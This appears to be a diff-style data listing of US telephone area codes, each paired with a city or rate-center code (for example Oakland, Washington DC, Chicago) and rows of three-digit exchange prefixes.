+  415 CAOAK 302 339 346 351 352 357 362 374 376 385 391 392 393 394 395
+  415 CAOAK 396 397 398 399 420 421 425 428 430 431 433 434 436 437 441
+  415 CAOAK 442 444 445 446 448 451 452 464 465 466 474 477 478 481 482
+  415 CAOAK 483 486 495 521 522 523 524 525 526 527 528 529 530 531 532
+  415 CAOAK 533 534 535 536 537 538 539 540 541 542 543 544 545 546 547
+  415 CAOAK 548 549 550 552 553 554 556 557 558 559 561 562 563 565 567
+  415 CAOAK 568 569 576 577 581 582 596 597 620 621 622 624 626 627 631
+  415 CAOAK 632 633 635 636 638 639 641 642 643 644 645 647 648 649 652
+  415 CAOAK 653 654 655 658 660 667 668 670 673 677 678 695 724 727 729
+  415 CAOAK 732 733 736 739 741 743 746 748 749 758 762 763 764 765 768
+  415 CAOAK 769 771 772 773 774 775 776 777 781 782 783 784 785 786 788
+  415 CAOAK 799 820 821 822 824 826 831 832 834 835 836 837 838 839 840
+  415 CAOAK 841 843 845 848 849 860 861 863 864 865 869 874 881 882 884
+  415 CAOAK 885 886 887 888 889 891 893 894 895 896 921 922 923 928 929
+  415 CAOAK 930 931 932 933 934 935 936 937 938 939 942 943 944 945 946
+  415 CAOAK 947 951 953 954 955 956 957 970 971 972 973 974 975 977 978
+  415 CAOAK 979 981 982 983 984 985 986 987 989 990 995 996 998 999
+  415 CAPAL 226 276 278 321 322 323 324 325 326 327 328 329 335 336 340
+  415 CAPAL 341 342 343 344 345 347 348 349 354 358 361 363 364 365 366
+  415 CAPAL 367 368 369 371 375 377 378 424 429 438 471 475 481 487 489
+  415 CAPAL 490 493 494 496 497 498 537 538 570 571 572 573 574 578 579
+  415 CAPAL 581 582 591 592 593 594 595 598 623 637 651 656 657 659 670
+  415 CAPAL 683 688 691 694 696 722 723 725 727 732 733 745 770 780 782
+  415 CAPAL 783 784 785 786 790 791 792 793 794 795 796 797 851 852 853
+  415 CAPAL 854 855 856 857 858 859 881 884 886 887 888 889 926 940 941
+  415 CAPAL 948 949 960 961 962 964 965 966 967 968 969
+  916 CASAC 278 321 322 323 324 325 326 327 328 329 331 332 334 338 339
+  916 CASAC 344 348 349 351 353 355 361 362 363 364 366 368 369 371 372
+  916 CASAC 373 381 383 386 387 388 391 392 393 394 395 399 421 422 423
+  916 CASAC 424 425 427 428 429 440 441 442 443 444 445 446 447 448 449
+  916 CASAC 451 452 453 454 455 456 457 480 481 482 483 484 485 486 487
+  916 CASAC 488 489 531 535 537 539 551 552 553 557 567 568 593 631 635
+  916 CASAC 636 638 641 643 646 648 649 653 654 657 665 682 683 684 685
+  916 CASAC 686 687 688 689 721 722 723 725 726 727 728 729 731 732 733
+  916 CASAC 734 736 737 739 745 747 761 762 763 764 765 766 767 768 785
+  916 CASAC 852 855 863 920 921 922 923 924 925 927 928 929 933 939 944
+  916 CASAC 951 957 961 962 965 966 967 969 971 972 973 974 978 983 985
+  916 CASAC 987 988 989 991 992
+1 213 CASAN 430 431 433 434 438 439 493 494 498 592 594 596 597 598 797
+1 213 CASAN 799 985 987
+  714 CASAN 220 228 229 236 239 241 250 251 253 255 256 258 259 261 262
+  714 CASAN 265 282 283 285 289 321 322 323 324 325 326 327 328 329 332
+  714 CASAN 367 372 373 374 380 385 414 415 418 432 433 441 447 449 455
+  714 CASAN 458 472 474 475 476 490 491 494 497 499 502 503 509 513 515
+  714 CASAN 516 517 519 520 521 522 523 524 525 526 527 528 529 530 531
+  714 CASAN 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546
+  714 CASAN 547 548 549 550 551 552 553 554 556 557 558 559 565 566 567
+  714 CASAN 568 569 572 579 581 582 583 586 587 588 589 630 631 632 633
+  714 CASAN 634 635 636 637 638 639 640 641 642 643 644 645 646 647 648
+  714 CASAN 649 650 651 660 662 663 664 665 666 667 668 669 670 671 673
+  714 CASAN 675 680 691 692 693 707 708 712 720 721 722 723 724 725 726
+  714 CASAN 727 729 730 731 732 733 738 739 740 741 742 743 744 745 746
+  714 CASAN 747 748 750 751 752 754 755 756 757 758 759 760 761 762 764
+  714 CASAN 768 770 771 772 773 774 775 776 777 778 779 786 821 826 827
+  714 CASAN 828 830 831 832 833 834 835 836 837 838 839 840 841 842 843
+  714 CASAN 846 847 848 850 851 852 854 855 856 857 858 859 863 870 871
+  714 CASAN 879 890 891 892 893 894 895 896 897 898 921 937 938 939 951
+  714 CASAN 952 953 954 955 956 957 960 961 962 963 964 965 966 968 969
+  714 CASAN 970 971 972 973 974 975 977 978 979 990 991 992 993 994 995
+  714 CASAN 996 997 998 999
+  619 CASDI 221 222 223 224 225 226 229 230 231 232 233 234 235 236 237
+  619 CASDI 238 239 258 260 262 263 264 265 266 267 268 270 271 272 273
+  619 CASDI 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288
+  619 CASDI 289 290 291 292 293 294 295 296 297 298 299 336 338 390 401
+  619 CASDI 404 406 408 412 413 416 417 419 420 421 422 423 424 425 426
+  619 CASDI 427 428 429 435 437 440 441 442 443 444 447 448 449 450 451
+  619 CASDI 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466
+  619 CASDI 469 470 472 474 475 476 477 479 482 483 484 485 487 488 490
+  619 CASDI 491 492 493 494 495 496 497 502 505 506 508 514 518 522 524
+  619 CASDI 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539
+  619 CASDI 540 541 542 543 544 545 546 547 548 549 551 552 553 554 556
+  619 CASDI 557 558 559 560 561 562 563 565 566 569 570 571 573 574 575
+  619 CASDI 576 578 579 580 581 582 583 584 585 586 587 588 589 592 594
+  619 CASDI 604 660 661 662 668 669 670 672 673 690 691 692 693 694 695
+  619 CASDI 696 697 698 699 701 702 717 980 981 987 990 991
+  415 CASFA 200 221 227 231 232 233 234 235 236 237 239 241 243 244 251
+  415 CASFA 252 255 257 258 259 261 263 264 266 267 268 269 271 272 273
+  415 CASFA 274 279 282 285 287 289 291 292 296 298 302 330 331 332 333
+  415 CASFA 334 337 338 339 340 341 342 343 344 345 346 347 348 349 355
+  415 CASFA 358 359 362 371 374 375 377 378 381 383 385 386 387 388 389
+  415 CASFA 391 392 393 394 395 396 397 398 399 420 421 428 431 433 434
+  415 CASFA 435 436 437 441 442 444 445 446 448 451 452 453 454 456 457
+  415 CASFA 459 461 464 465 466 467 468 469 472 474 476 477 478 479 482
+  415 CASFA 485 488 491 492 495 499 502 521 522 523 530 531 532 533 534
+  415 CASFA 535 536 539 541 542 543 544 545 546 547 550 552 553 554 556
+  415 CASFA 557 558 561 563 564 565 566 567 570 571 572 573 574 576 578
+  415 CASFA 579 583 584 585 586 587 588 589 596 597 620 621 622 624 626
+  415 CASFA 627 641 645 647 648 652 653 654 655 658 660 661 664 665 666
+  415 CASFA 668 673 677 681 692 695 696 697 721 722 731 737 738 739 742
+  415 CASFA 748 749 750 751 752 753 755 756 759 761 762 763 764 765 768
+  415 CASFA 769 771 772 773 774 775 776 777 781 788 789 821 822 824 826
+  415 CASFA 832 834 835 836 839 840 860 861 863 864 865 869 871 872 873
+  415 CASFA 874 875 876 877 878 882 885 891 893 894 896 921 922 923 924
+  415 CASFA 925 927 928 929 931 936 951 952 953 954 955 956 957 970 971
+  415 CASFA 972 973 974 978 979 981 982 983 984 985 986 987 989 990 991
+  415 CASFA 992 993 994 995 996 997 998 999
+  408 CASJO 221 223 224 225 226 227 234 235 236 237 238 241 243 244 245
+  408 CASJO 246 247 248 249 251 252 253 255 256 257 258 259 262 263 264
+  408 CASJO 265 266 267 268 269 270 272 274 275 276 277 279 280 281 282
+  408 CASJO 283 284 285 286 287 288 289 291 292 293 294 295 296 297 298
+  408 CASJO 299 332 345 353 354 356 358 365 370 371 374 376 377 378 379
+  408 CASJO 395 398 399 432 433 434 435 436 437 441 446 447 448 452 453
+  408 CASJO 463 473 491 492 496 499 522 524 534 552 553 554 559 562 575
+  408 CASJO 578 629 720 721 723 725 727 729 730 732 733 734 735 736 737
+  408 CASJO 738 739 741 742 743 744 745 746 747 748 749 752 756 765 773
+  408 CASJO 864 865 866 867 879 920 922 923 924 925 926 927 929 942 943
+  408 CASJO 945 946 947 954 957 970 971 972 973 974 977 978 980 982 983
+  408 CASJO 984 985 986 987 988 989 991 992 993 994 995 996 997 998
+1 415 CASJO 226 335 336 438 490 498 623 651 656 657 659 683 691 694 77
+1 415 CASJO 940 941 948 949 960 961 962 964 965 966 967 968 969
+  303 CODEN 200 220 230 231 232 233 234 235 236 237 238 239 252 255 261
+  303 CODEN 266 270 271 273 277 278 279 280 281 286 287 288 289 290 291
+  303 CODEN 292 293 294 295 296 297 298 299 320 321 322 329 331 333 337
+  303 CODEN 340 341 343 344 348 355 360 361 363 364 366 367 368 369 370
+  303 CODEN 371 372 373 375 377 388 393 394 397 398 399 420 421 422 423
+  303 CODEN 424 425 426 427 428 429 430 431 433 440 441 442 443 444 447
+  303 CODEN 449 450 451 452 455 457 458 460 461 465 466 467 469 470 477
+  303 CODEN 478 480 492 494 497 499 526 530 534 538 556 571 572 573 575
+  303 CODEN 581 592 595 620 623 624 628 629 631 639 640 642 643 649 650
+  303 CODEN 654 657 659 660 665 666 670 671 673 674 676 680 681 688 689
+  303 CODEN 690 691 692 693 694 695 696 697 698 699 720 721 722 727 730
+  303 CODEN 733 739 740 741 743 744 745 750 751 752 753 755 756 757 758
+  303 CODEN 759 760 761 762 763 764 766 770 771 773 777 778 779 780 781
+  303 CODEN 782 786 787 788 789 790 791 792 793 794 795 796 797 798 799
+  303 CODEN 820 821 825 826 829 830 831 832 836 837 839 840 841 843 844
+  303 CODEN 850 851 855 860 861 863 866 868 869 871 877 880 888 889 890
+  303 CODEN 891 892 893 894 896 898 899 922 924 930 932 933 934 935 936
+  303 CODEN 937 938 939 940 964 965 966 969 971 972 973 977 978 979 980
+  303 CODEN 985 986 987 988 989
+  203 CTHAR 223 224 225 229 231 232 233 236 240 241 242 243 244 246 247
+  203 CTHAR 249 252 257 258 273 275 277 278 279 280 282 285 286 289 291
+  203 CTHAR 292 293 296 297 298 299 520 521 522 523 524 525 527 528 529
+  203 CTHAR 547 548 549 557 559 560 561 563 565 566 568 569 623 627 633
+  203 CTHAR 643 644 645 646 647 648 649 651 653 654 657 658 659 660 665
+  203 CTHAR 666 667 668 673 674 675 676 677 678 679 683 688 693 721 722
+  203 CTHAR 724 725 726 727 728 826 827 828 829 841 843 870 871 872 875
+  203 CTHAR 930 936 951 952 953 954
+  202 DCWAS 200 204 206 207 208 209 210 213 214 217 218 220 222 223 224
+  202 DCWAS 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239
+  202 DCWAS 240 241 242 243 244 245 246 247 248 249 250 251 252 254 255
+  202 DCWAS 256 258 259 260 262 263 264 265 266 267 268 269 270 271 272
+  202 DCWAS 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287
+  202 DCWAS 288 289 291 292 293 294 295 296 297 298 299 306 307 309 310
+  202 DCWAS 317 319 320 321 322 323 324 325 326 328 329 330 331 332 333
+  202 DCWAS 334 336 337 338 339 340 341 342 343 344 345 346 347 348 350
+  202 DCWAS 351 352 353 354 355 356 357 358 359 360 362 363 364 365 366
+  202 DCWAS 369 370 371 372 373 374 376 377 378 379 380 382 383 384 385
+  202 DCWAS 386 387 388 389 390 391 392 393 394 395 396 397 398 399 401
+  202 DCWAS 402 403 404 406 407 408 409 415 416 417 418 420 421 422 423
+  202 DCWAS 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438
+  202 DCWAS 439 440 441 442 443 444 445 447 448 449 450 451 452 453 454
+  202 DCWAS 455 456 457 458 459 460 461 462 463 464 466 467 468 469 470
+  202 DCWAS 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485
+  202 DCWAS 486 487 488 490 492 493 495 496 497 498 499 501 502 503 504
+  202 DCWAS 505 506 507 509 513 514 516 517 519 520 521 522 523 524 525
+  202 DCWAS 526 527 528 529 530 532 533 534 535 536 537 538 539 540 541
+  202 DCWAS 542 543 544 545 546 547 548 549 550 551 552 553 554 556 557
+  202 DCWAS 558 559 560 561 562 563 564 565 566 567 568 569 570 571 572
+  202 DCWAS 573 574 575 576 577 578 580 581 582 583 584 585 586 587 588
+  202 DCWAS 589 590 591 592 593 595 597 598 599 601 602 603 604 605 606
+  202 DCWAS 608 610 613 618 619 620 622 623 624 625 626 627 628 630 631
+  202 DCWAS 632 633 634 635 636 637 638 639 640 641 642 643 644 646 647
+  202 DCWAS 648 649 650 651 652 653 654 656 657 658 659 660 661 662 663
+  202 DCWAS 664 665 666 667 668 669 670 671 673 675 676 678 679 680 681
+  202 DCWAS 682 683 684 685 686 687 688 689 690 691 692 693 694 695 696
+  202 DCWAS 697 698 699 702 706 707 708 709 712 713 714 715 719 722 723
+  202 DCWAS 724 725 726 727 728 731 732 733 734 735 736 737 738 739 742
+  202 DCWAS 745 746 749 750 751 752 753 755 756 758 759 760 761 762 763
+  202 DCWAS 764 765 767 768 769 770 772 773 774 775 776 778 779 780 781
+  202 DCWAS 783 784 785 786 787 789 790 794 795 797 799 801 802 803 805
+  202 DCWAS 806 807 808 812 815 816 817 818 820 821 822 823 824 825 826
+  202 DCWAS 827 828 829 830 832 833 834 835 836 837 838 839 840 841 842
+  202 DCWAS 843 844 845 846 847 848 849 850 851 852 853 856 857 860 861
+  202 DCWAS 862 863 864 865 866 868 869 870 871 872 874 875 876 877 879
+  202 DCWAS 881 882 883 885 887 888 889 890 891 892 893 894 895 896 897
+  202 DCWAS 898 899 901 904 906 907 912 913 914 916 917 920 921 922 924
+  202 DCWAS 925 926 927 928 929 930 931 933 934 935 936 937 938 939 940
+  202 DCWAS 941 942 943 944 946 947 948 949 951 952 953 954 955 956 957
+  202 DCWAS 960 961 962 963 965 966 967 968 971 972 974 975 977 978 979
+  202 DCWAS 980 981 982 983 984 985 986 989 990 991 994 996 998
+1 301 DCWAS 206 209 210 217 220 227 229 230 231 236 238 240 248 249 251
+1 301 DCWAS 258 262 270 277 279 283 286 292 294 295 297 299 306 309 317
+1 301 DCWAS 320 322 330 336 340 341 344 345 350 353 365 369 372 380 384
+1 301 DCWAS 386 390 394 402 403 409 417 420 421 422 423 424 427 428 431
+1 301 DCWAS 434 436 439 441 443 445 449 454 459 460 464 468 469 470 474
+1 301 DCWAS 480 490 492 493 495 496 497 498 499 502 505 507 509 513 520
+1 301 DCWAS 530 540 552 559 564 565 567 568 570 571 572 577 580 585 587
+1 301 DCWAS 588 589 590 593 595 598 599 601 604 608 618 622 627 630 640
+1 301 DCWAS 649 650 652 654 656 657 670 680 681 688 699 702 713 725 731
+1 301 DCWAS 735 736 738 753 762 763 770 772 773 774 776 779 794 805 807
+1 301 DCWAS 808 816 839 840 843 851 852 853 856 864 868 869 870 871 881
+1 301 DCWAS 888 890 891 894 897 899 907 913 916 921 924 925 926 927 929
+1 301 DCWAS 930 933 935 937 940 942 946 948 949 951 952 953 961 963 967
+1 301 DCWAS 972 975 977 980 981 982 983 984 985 986 989 990
+1 703 DCWAS 204 207 214 218 222 235 237 239 241 242 243 246 247 250 255
+1 703 DCWAS 256 260 263 264 266 271 273 274 276 278 280 281 284 285 321
+1 703 DCWAS 323 325 329 339 351 352 354 355 356 358 359 360 370 378 379
+1 703 DCWAS 385 391 406 407 415 418 425 430 435 437 438 440 442 444 448
+1 703 DCWAS 450 451 455 461 471 476 478 481 482 486 487 503 506 516 517
+1 703 DCWAS 519 521 522 524 525 527 528 532 533 534 536 538 548 549 550
+1 703 DCWAS 551 553 556 557 558 560 569 573 578 591 602 603 620 631 641
+1 703 DCWAS 642 643 644 648 658 660 661 664 671 683 684 685 689 690 691
+1 703 DCWAS 698 706 709 712 715 719 733 734 739 742 746 749 750 751 756
+1 703 DCWAS 758 759 760 761 764 765 768 769 780 781 787 790 795 799 802
+1 703 DCWAS 803 815 817 818 820 821 823 824 826 827 830 834 836 838 841
+1 703 DCWAS 845 846 847 848 849 850 860 866 874 875 876 883 892 893 904
+1 703 DCWAS 912 914 920 922 931 934 938 941 960 968 971 974 978 979 998
+  305 FLMIA 220 221 222 223 224 226 227 230 232 233 235 238 242 245 246
+  305 FLMIA 247 248 250 251 252 253 254 255 257 258 261 262 263 264 266
+  305 FLMIA 267 268 270 271 274 279 284 285 324 325 326 327 329 332 342
+  305 FLMIA 343 347 348 349 350 352 353 354 358 361 362 363 364 365 366
+  305 FLMIA 371 372 373 374 375 376 377 378 379 380 381 382 385 386 387
+  305 FLMIA 388 397 399 441 442 443 444 445 446 447 448 449 460 464 470
+  305 FLMIA 471 477 478 520 526 529 530 531 532 534 535 536 538 539 541
+  305 FLMIA 542 543 544 545 547 548 549 550 551 552 553 554 556 557 558
+  305 FLMIA 559 560 567 571 573 575 576 577 578 579 590 591 592 593 594
+  305 FLMIA 595 596 598 599 620 621 623 624 625 628 633 634 635 636 637
+  305 FLMIA 638 642 643 644 649 651 652 653 654 661 662 663 665 666 667
+  305 FLMIA 669 670 672 673 674 681 685 687 688 691 693 694 696 751 754
+  305 FLMIA 756 757 758 759 762 769 770 773 775 780 787 789 794 795 821
+  305 FLMIA 822 823 825 827 829 835 836 854 855 856 858 859 861 864 865
+  305 FLMIA 866 867 868 871 873 874 876 880 881 882 883 884 885 886 887
+  305 FLMIA 888 889 891 892 893 895 899 931 932 933 935 937 939 940 944
+  305 FLMIA 945 947 948 949 951 952 953 956 957 993 995
+  407 FLORL 222 228 236 237 238 239 240 244 246 247 249 256 257 260 262
+  407 FLORL 263 273 275 277 281 282 290 291 292 293 294 295 297 298 299
+  407 FLORL 327 331 332 339 341 342 345 351 352 354 356 363 365 366 380
+  407 FLORL 381 382 420 422 423 424 425 438 469 539 560 568 578 579 623
+  407 FLORL 628 629 644 645 646 647 648 649 651 656 657 658 660 661 671
+  407 FLORL 672 675 677 678 679 682 695 696 699 740 767 774 788 823 824
+  407 FLORL 825 826 827 828 830 831 834 836 839 841 843 849 850 851 855
+  407 FLORL 856 857 859 862 869 872 875 876 877 880 884 886 889 894 895
+  407 FLORL 896 897 898 899 934 939
+  813 FLTAM 221 222 223 224 225 226 227 228 229 231 232 234 236 237 238
+  813 FLTAM 239 240 241 242 247 248 251 253 254 258 259 264 265 272 273
+  813 FLTAM 276 281 286 287 289 620 621 622 623 626 628 633 634 641 645
+  813 FLTAM 653 654 661 662 664 671 677 681 684 685 689 690 830 831 832
+  813 FLTAM 835 837 839 840 854 855 870 871 872 873 874 875 876 877 878
+  813 FLTAM 879 880 881 882 883 884 885 886 887 888 889 920 931 932 933
+  813 FLTAM 935 948 949 960 961 962 963 968 969 971 972 973 974 977 978
+  813 FLTAM 979 980 985 986 987 988 989 990 996
+  404 GAATL 200 212 215 220 221 222 223 225 230 231 233 237 238 239 240
+  404 GAATL 241 242 243 244 246 247 248 249 250 252 255 256 257 260 261
+  404 GAATL 262 263 264 266 270 271 279 280 281 284 286 288 289 292 294
+  404 GAATL 296 297 299 310 312 313 314 315 316 319 320 321 325 329 330
+  404 GAATL 331 332 333 339 341 343 344 346 347 348 349 350 351 352 355
+  404 GAATL 360 361 362 363 364 365 366 368 370 371 372 373 377 378 380
+  404 GAATL 381 383 388 389 390 391 392 393 394 395 396 399 413 416 417
+  404 GAATL 420 421 422 423 424 425 426 427 428 429 431 432 433 434 435
+  404 GAATL 436 438 439 441 442 443 445 446 447 448 449 451 452 454 455
+  404 GAATL 457 458 460 461 463 466 469 471 473 474 475 476 477 478 482
+  404 GAATL 483 484 487 488 489 491 493 494 496 497 498 499 505 508 512
+  404 GAATL 513 515 520 521 522 523 524 525 526 527 528 529 530 533 550
+  404 GAATL 551 552 558 559 564 565 566 570 572 573 577 578 580 581 584
+  404 GAATL 586 587 588 589 590 591 593 594 603 607 610 618 619 621 622
+  404 GAATL 623 624 626 627 631 633 634 636 639 640 641 642 651 653 656
+  404 GAATL 658 659 661 662 664 668 669 671 676 679 680 681 683 686 688
+  404 GAATL 690 691 696 697 698 699 712 717 723 726 727 728 729 730 732
+  404 GAATL 739 740 741 744 750 751 752 753 755 756 758 760 761 762 763
+  404 GAATL 765 766 767 768 772 774 785 792 794 799 804 808 810 815 822
+  404 GAATL 827 833 835 837 839 840 841 842 843 847 848 850 851 852 853
+  404 GAATL 859 870 871 872 873 874 875 876 877 879 880 881 885 888 890
+  404 GAATL 892 894 897 898 899 907 916 920 921 922 923 924 925 926 928
+  404 GAATL 929 932 933 934 936 938 939 941 942 943 944 945 946 948 949
+  404 GAATL 951 952 953 954 955 956 957 960 961 962 963 964 968 969 971
+  404 GAATL 972 973 974 975 977 978 979 980 981 982 984 985 986 987 988
+  404 GAATL 991 992 993 994 995 996 997 998 999
+  312 ILCHI 202 204 207 214 220 221 222 224 225 226 227 229 230 233 235
+  312 ILCHI 236 237 238 239 241 242 243 245 247 248 252 254 261 262 263
+  312 ILCHI 264 265 266 267 268 269 271 273 274 275 276 277 278 280 281
+  312 ILCHI 282 283 284 285 286 287 288 292 294 302 306 308 313 321 322
+  312 ILCHI 324 326 327 329 332 334 337 338 341 342 346 347 348 353 363
+  312 ILCHI 368 372 373 374 375 376 378 379 380 384 404 407 408 410 413
+  312 ILCHI 413 415 417 419 421 427 431 434 435 436 440 443 444 445 454
+  312 ILCHI 461 463 465 467 468 471 472 476 477 478 483 486 487 488 489
+  312 ILCHI 493 507 508 509 514 521 522 523 525 527 528 533 536 538 539
+  312 ILCHI 542 545 548 549 558 559 561 565 567 568 569 580 581 582 583
+  312 ILCHI 585 586 588 589 591 592 601 602 604 606 609 621 622 624 625
+  312 ILCHI 626 630 631 633 637 638 641 642 643 644 645 646 648 649 650
+  312 ILCHI 651 660 661 663 664 666 667 670 684 685 686 693 694 701 702
+  312 ILCHI 703 704 707 712 715 716 718 721 722 723 725 726 727 728 731
+  312 ILCHI 732 733 734 735 736 737 738 743 744 745 750 751 752 753 760
+  312 ILCHI 761 762 763 764 765 767 768 769 770 772 774 775 776 777 778
+  312 ILCHI 779 781 782 783 784 785 786 787 791 792 793 794 796 797 802
+  312 ILCHI 804 805 807 808 812 814 819 821 822 826 828 829 836 838 842
+  312 ILCHI 845 846 847 853 854 855 856 861 871 873 874 875 876 878 880
+  312 ILCHI 881 883 886 889 890 899 901 902 903 906 907 908 909 915 917
+  312 ILCHI 918 921 922 923 924 925 927 928 929 930 933 935 936 938 939
+  312 ILCHI 942 943 944 947 951 955 962 973 975 977 978 984 987 988 989
+  312 ILCHI 992 993 994 995 996 997
+1 708 ILCHI 200 201 203 205 206 208 209 210 213 215 216 218 223 228 231
+1 708 ILCHI 232 234 240 244 246 249 250 251 253 255 256 257 258 259 260
+1 708 ILCHI 272 279 289 290 291 293 295 296 297 298 299 301 303 304 307
+1 708 ILCHI 310 314 315 316 317 318 319 323 325 328 330 331 333 335 336
+1 708 ILCHI 339 343 344 345 349 350 351 352 354 355 357 358 359 360 361
+1 708 ILCHI 362 364 366 367 369 371 377 381 382 383 385 386 387 388 389
+1 708 ILCHI 390 391 392 393 394 396 397 398 401 402 403 405 406 409 412
+1 708 ILCHI 416 418 420 422 423 424 425 426 428 429 430 432 433 437 438
+1 708 ILCHI 439 441 442 446 447 448 449 450 451 452 453 455 456 457 458
+1 708 ILCHI 459 460 462 469 470 473 474 475 479 480 481 482 484 485 490
+1 708 ILCHI 491 492 495 496 498 499 501 502 503 504 505 506 510 512 513
+1 708 ILCHI 515 516 517 518 519 520 524 526 529 530 531 532 534 535 537
+1 708 ILCHI 540 541 543 544 547 550 551 560 562 563 564 566 570 571 572
+1 708 ILCHI 573 574 575 576 577 578 579 584 590 593 594 595 596 597 598
+1 708 ILCHI 599 603 605 607 608 612 613 614 615 617 618 619 620 623 627
+1 708 ILCHI 628 629 632 634 635 636 639 640 647 652 653 654 655 656 657
+1 708 ILCHI 658 659 662 665 668 671 672 673 674 675 676 677 678 679 680
+1 708 ILCHI 681 682 687 688 689 690 691 692 695 696 697 698 699 705 706
+1 708 ILCHI 709 713 714 717 719 720 724 729 730 739 741 742 746 747 748
+1 708 ILCHI 749 754 755 756 757 758 759 766 771 773 780 788 789 790 795
+1 708 ILCHI 798 799 801 803 806 810 816 817 818 820 823 824 825 827 830
+1 708 ILCHI 831 832 833 834 835 837 839 840 841 843 844 848 849 850 851
+1 708 ILCHI 852 857 858 859 860 862 863 864 865 866 867 868 869 870 872
+1 708 ILCHI 877 879 882 884 885 887 888 891 892 893 894 895 896 897 898
+1 708 ILCHI 904 905 910 913 914 916 919 920 926 931 932 934 937 940 941
+1 708 ILCHI 945 946 948 949 952 953 954 956 957 960 961 963 964 965 966
+1 708 ILCHI 967 968 969 971 972 974 979 980 981 982 983 985 986 990 991
+1 708 ILCHI 998
+1 815 ILCHI 254 372 423 424 436 439 469 474 478 485 722 723 725 726 727
+1 815 ILCHI 729 740 741 744 773 774 834 838 886
+  317 ININD 200 222 226 228 230 231 232 233 235 236 237 238 239 240 241
+  317 ININD 242 243 244 247 248 251 252 253 254 255 256 257 259 261 262
+  317 ININD 263 264 265 266 267 269 271 272 273 274 276 277 278 283 290
+  317 ININD 291 293 297 298 299 321 322 326 328 335 351 352 353 355 356
+  317 ININD 357 359 422 424 425 431 432 439 441 442 443 445 461 462 464
+  317 ININD 465 466 467 469 470 471 485 486 488 535 539 541 542 543 545
+  317 ININD 546 547 549 556 571 573 574 575 576 577 578 579 580 630 631
+  317 ININD 632 633 634 635 636 637 638 639 681 684 685 686 687 691 694
+  317 ININD 736 738 745 769 773 776 780 781 782 783 784 786 787 788 823
+  317 ININD 831 835 838 839 841 842 843 844 845 846 848 849 852 856 861
+  317 ININD 862 867 870 871 872 873 875 876 877 878 879 881 882 885 887
+  317 ININD 888 889 891 892 894 895 896 897 898 899 920 921 923 924 925
+  317 ININD 926 927 928 929 976 994 996
+  504 LANOR 241 242 243 244 245 246 253 254 255 257 260 271 277 278 279
+  504 LANOR 282 283 286 288 340 341 347 348 349 361 362 363 364 366 367
+  504 LANOR 368 391 392 393 394 398 431 436 441 443 450 451 454 455 456
+  504 LANOR 461 462 464 465 466 467 468 469 482 483 484 486 488 521 522
+  504 LANOR 523 524 525 527 528 529 552 561 565 566 568 569 581 582 583
+  504 LANOR 584 585 586 587 588 589 592 593 595 596 597 656 662 671 676
+  504 LANOR 682 684 689 731 733 734 736 737 738 739 762 821 822 824 826
+  504 LANOR 827 830 831 832 833 834 835 836 837 838 861 862 865 866 883
+  504 LANOR 884 885 887 888 889 891 895 896 897 899 941 942 943 944 945
+  504 LANOR 947 948 949 976
+  617 MABOS 200 223 224 225 226 227 230 231 232 233 234 235 236 237 239
+  617 MABOS 241 242 243 244 245 246 247 248 252 253 254 257 258 261 262
+  617 MABOS 263 264 265 266 267 268 269 271 274 275 276 277 278 279 280
+  617 MABOS 282 284 285 286 287 288 289 290 292 296 298 320 321 322 323
+  617 MABOS 324 325 326 327 328 329 330 331 332 333 335 337 338 340 343
+  617 MABOS 345 348 349 350 353 354 357 361 362 364 367 375 377 380 381
+  617 MABOS 382 387 389 391 393 394 395 396 397 421 423 424 426 427 428
+  617 MABOS 429 431 432 434 436 437 438 439 442 444 445 446 449 450 451
+  617 MABOS 455 456 457 461 463 464 466 469 471 472 473 479 482 483 484
+  617 MABOS 486 487 488 489 491 492 493 494 495 496 497 498 499 522 523
+  617 MABOS 524 527 532 534 536 538 539 541 542 546 547 552 553 556 558
+  617 MABOS 560 561 562 565 566 567 568 569 570 571 572 573 574 576 577
+  617 MABOS 578 579 581 586 589 592 593 594 595 596 598 599 621 622 623
+  617 MABOS 625 628 629 630 633 635 637 638 641 642 643 646 647 648 654
+  617 MABOS 661 662 665 666 669 674 680 684 693 694 695 696 698 720 721
+  617 MABOS 722 723 724 725 726 727 728 729 730 731 732 733 734 735 736
+  617 MABOS 737 738 739 740 742 743 748 749 756 770 773 774 776 781 782
+  617 MABOS 783 786 787 789 825 841 842 843 845 846 847 848 849 855 859
+  617 MABOS 860 861 862 863 864 868 873 876 884 887 889 890 891 893 894
+  617 MABOS 895 899 923 924 925 926 929 930 931 932 933 935 936 937 938
+  617 MABOS 942 944 945 951 954 955 956 958 962 964 965 966 969 972 973
+  617 MABOS 974 979 981 983 984 985
+  313 MIAAR 420 426 428 429 434 437 439 449 451 453 454 455 459 475 481
+  313 MIAAR 482 483 484 485 486 487 495 572 662 663 665 668 677 747 761
+  313 MIAAR 763 764 769 930 936 971 973 981 994 995 996 998
+  313 MIDET 222 223 224 225 226 237 240 245 252 255 256 259 267 270 271
+  313 MIDET 272 273 274 275 276 277 278 291 292 295 297 298 320 321 322
+  313 MIDET 323 328 330 331 336 337 341 342 343 345 361 365 366 368 369
+  313 MIDET 371 372 381 382 383 386 388 389 390 393 396 430 431 436 438
+  313 MIDET 440 441 444 446 448 460 491 493 494 496 499 520 521 526 527
+  313 MIDET 531 532 533 534 535 536 537 538 554 556 560 561 562 563 564
+  313 MIDET 565 567 568 571 577 579 581 582 584 592 593 594 596 599 630
+  313 MIDET 690 745 770 780 821 822 823 824 829 831 832 833 834 835 836
+  313 MIDET 837 838 839 841 842 843 845 846 849 861 862 863 864 865 866
+  313 MIDET 867 868 869 871 872 873 874 875 876 881 882 883 884 885 886
+  313 MIDET 891 892 893 894 895 896 897 898 899 921 922 923 924 925 926
+  313 MIDET 927 928 929 931 933 934 935 937 940 943 945 956 961 962 963
+  313 MIDET 964 965 966 972 974 976 980 983 993
+  612 MNMIN 220 221 222 223 224 227 228 229 290 291 292 293 296 297 298
+  612 MNMIN 323 330 331 332 333 334 335 336 337 338 339 340 341 342 343
+  612 MNMIN 344 347 348 349 368 370 371 372 373 374 375 376 377 378 379
+  612 MNMIN 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434
+  612 MNMIN 435 436 437 438 439 440 441 443 444 445 446 447 448 449 450
+  612 MNMIN 451 452 454 455 456 457 458 459 460 461 462 463 464 469 470
